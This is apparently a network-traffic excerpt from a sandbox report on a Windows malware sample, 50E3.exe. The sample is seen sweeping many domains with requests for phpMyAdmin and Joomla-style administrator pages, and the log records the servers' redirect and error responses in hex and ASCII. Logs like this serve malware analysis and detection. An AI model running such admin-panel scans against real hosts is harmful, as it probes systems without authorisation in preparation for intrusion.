Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.184226990 CET	219	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.283663988 CET	925	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/phpMyAdmin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NL/Oqzwog842qkipk3zxVkceeCO72GVOpKoFc4RvVoMaTNV5VWMO918lTMv/+/2xkIEb6sJKUIE/K4H5+2Bh6w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:39.488775969 CET	925	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/phpMyAdmin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_NL/Oqzwog842qkipk3zxVkceeCO72GVOpKoFc4RvVoMaTNV5VWMO918lTMv/+/2xkIEb6sJKUIE/K4H5+2Bh6w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	57485	145.14.30.248	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.195081949 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.407855034 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	57999	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.203859091 CET	223	OUT	GET /phpmyadmin/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.394546986 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:22:39 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	58092	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.216319084 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.397897959 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	58182	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.233149052 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.412858963 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	56329	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.267221928 CET	298	OUT	GET /administrator/index.php HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip Cookie: _dhc.139992723=222c8f6b-c030-4c0b-9d05-2464b2dacc4a User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.381753922 CET	496	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:12 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	56328	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.267266989 CET	297	OUT	GET /administrator/index.php HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip Cookie: _dhc.651070=65f6761b-83f1-4927-9f54-1ecf80cdf74e User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.381491899 CET	494	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:12 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	58294	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.312109947 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.492894888 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	58295	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.396914005 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gmo.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.584486961 CET	339	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 6d 6f 2e 75 6b 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>42 <meta http-equiv='refresh' content='0; url=http://gmo.uk/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	58161	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.547137022 CET	224	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.677164078 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:39 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/phpmyadmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	58275	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.579292059 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.759315014 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	58296	104.247.82.52	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.595287085 CET	220	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.750684977 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_nhz7jsclGArUmmboKDIV0ngSJa7yDr8F+klG/HIX+PYn490n3FwYcdseEks15Duj1SkZAk2xtp7tU5j5zUz0Xg== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 37 65 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b eb 76 da c8 b2 fe 1d 3f 85 42 d6 36 f8 0c 37 01 be 47 ce c6 c1 d7 19 70 6c 93 c4 90 35 27 4b 48 0d 08 84 c4 96 84 01 67 e7 01 ce 73 9d 17 3b 5f 75 b7 6e 80 93 c9 ec c9 fc 39 cc c4 a0 ee ea ae ea ba 75 75 55 eb f5 cb c6 cd db 76 e7 dd 99 32 0c 26 f6 c9 d6 6b fa 52 4c 3d d0 0b ba d9 b3 5d 63 3c 66 4b 2d d3 3c 9f cf 1b b7 9d eb 5f dd ee d5 f0 d1 68 d5 6f cf 4e 4f 6f eb 8d fb 79 7d 7e 5f bf 3e ad ff f6 af 59 e3 fc ac fd 70 e7 94 2f bd f2 6e ff fd bb fd b3 eb f6 fe fe a2 e3 bc 9b dc f5 a6 cd 65 ed 71 7c f0 6b c7 ba 74 c6 ad 29 33 9d d1 4d bd 75 6d e8 0f 8d 07 e3 d7 db eb 56 d9 79 f8 b5 7b fd db 7e db b0 ae 1b 07 75 f7 f2 e1 57 75 f7 e0 6d 7d 7e 56 af df 6a da 67 67 f8 b4 3f f2 0d fb a2 ee bd 9f 4c 7a ee af 8d ab 0f 65 67 70 7f ad ef 2f 1b de c1 f9 2f 63 fb a2 74 79 f5 f0 cb bb 8e 53 3b 2c 3b d5 f3 79 c7 30 7d 76 36 f6 d5 dd c6 6c a4 de 8f bb f5 71 65 11 4c f7 83 f7 bb a3 dd a7 f7 4f e5 87 81 a6 65 94 c5 c4 76 7c 2d 33 0c 82 e9 51 a9 34 9f cf 8b f3 6a d1 f5 06 25 f5 f0 f0 b0 b4 20 7e 70 a0 23 5b 77 06 5a 86 39 19 25 fa 45 fc 62 ba 79 b2 a5 e0 f3 7a c2 02 1d 6c 0c a6 05 f6 af 99 f5 a8 65 de ba 4e c0 9c a0 d0 5e 4e 59 46 31 c4 93 96 09 d8 22 28 d1 bc c7 8a 31 d4 3d 9f 05 da 2c e8 17 0e 32 a5 e4 44 8e 3e 61 5a e6 d1 62 f3 a9 eb 05 89 e1 73 cb 0c 86 9a c9 1e 2d 83 15 f8 43 5e b1 1c 2b b0 74 bb e0 1b ba cd 34 35 af f8 43 cf 72 c6 85 c0 2d f4 ad 40 73 dc 68 ee c0 0a 6c 76 62 4c 8a c6 d3 eb 92 78 10 d4 fb 86 67 4d 03 c5 f7 0c 2d 23 f8 30 70 dd Data Ascii: 7e5[v?B67Gpl5'KHgs;_un9uuUv2&kRL=]c<fK-<_hoNOoy}~_>Yp/neq\|kt)3MumVy{~uWum}~Vjgg?Lzegp//ctyS;,;y0}v6lqeLOev\|-3Q4j% ~p#[wZ9%EbyzleN^NYF1"(1=,2D>aZbs-C^+t45Cr-@shlvbLxgM-#0p
Nov 30, 2023 11:22:39.750735998 CET	1340	IN	Data Raw: 81 cd 8a 86 3b 29 e9 60 a5 e3 b3 92 e9 4e 74 cb f1 4b 86 de 2f 8e fc 37 7a 6f aa a9 99 93 d7 25 31 f8 84 b3 c1 0f 96 36 53 26 cc b4 74 2d 83 0e 06 96 9d 6c 15 75 1f 0b fd ec 07 ba 57 56 be 6c bd e8 e9 c6 78 e0 b9 33 c7 3c 52 66 9e 9d cb 96 4a 66 Data Ascii: ;)`NtK/7zo%16S&t-luWVlx3<RfJf`{a3kE`&/i8q2=Ppy[/8[:]i0c??f[+p5?$RT&=0pwLNuAb#1}f~Dfn
Nov 30, 2023 11:22:39.750745058 CET	294	IN	Data Raw: 66 46 c1 81 6f 80 13 6e e6 73 0f c7 e6 31 94 ea c5 8b 17 8d 9b e6 ff fe 4f ab ae e0 ff 77 77 37 8d b3 eb ad 17 af 4b 3a 4e d3 25 e8 a1 3c 04 af 6b 64 45 6a 24 d1 b7 41 61 ab 89 ee 55 10 11 68 65 14 5a bd a0 91 48 4c 0c 78 3d 54 c3 43 31 7e 71 89 Data Ascii: fFons1Oww7K:N%<kdEj$AaUheZHLx=TC1~q%8 U`8ZSnJ@$~Fb\X)W[wVTm+wt;E8tlErp3Ge`u1Xy2g=Hyl^Zi0ZZ-iPL\=a{HI
Nov 30, 2023 11:22:39.750790119 CET	1340	IN	Data Raw: 66 31 63 0d 0a 71 86 0f 66 be b6 64 3e 7a 5d 5b b4 66 77 10 9a 18 33 3f b7 13 29 67 1a 95 5c fd 3b 41 8f f2 8e e3 87 e6 90 fa 24 d6 18 ff 24 46 4a be ca 2f b8 34 91 ec 08 90 98 91 f9 98 98 17 22 bf 33 d3 07 e8 ba 06 87 ee 39 ac 44 fb a8 7b 4a 60 Data Ascii: f1cqfd>z][fw3?)g\;A$$FJ/4"39D{J`3%Ty?cY~=R;%"cS(6IpqK\|%w$ ctl1%AoY?O"zxVoFgVkHJ$;IjTU!_h[%
Nov 30, 2023 11:22:39.750798941 CET	1340	IN	Data Raw: be 49 b7 19 6a 6a 1a ce fe 06 d7 c6 22 8e 54 67 36 0a 62 c8 9a 2e af cc 98 be 9d 44 8f 7f ba 6c eb 03 da a1 72 59 ab ef e1 3b bb f3 a9 fc bb 08 3a 56 e7 07 0e 52 e4 eb fb 9b 56 11 81 a5 cf 72 c0 58 24 ab 2f fa b3 9e 1f 78 fc d9 32 8b 36 57 25 18 Data Ascii: Ijj"Tg6b.DlrY;:VRVrX$/x26W%8( qD&hL3308:BQ)P9,t$VCCnZHc;9uCc{BgSy;Y,eBADWhWB#lfDOj2^(
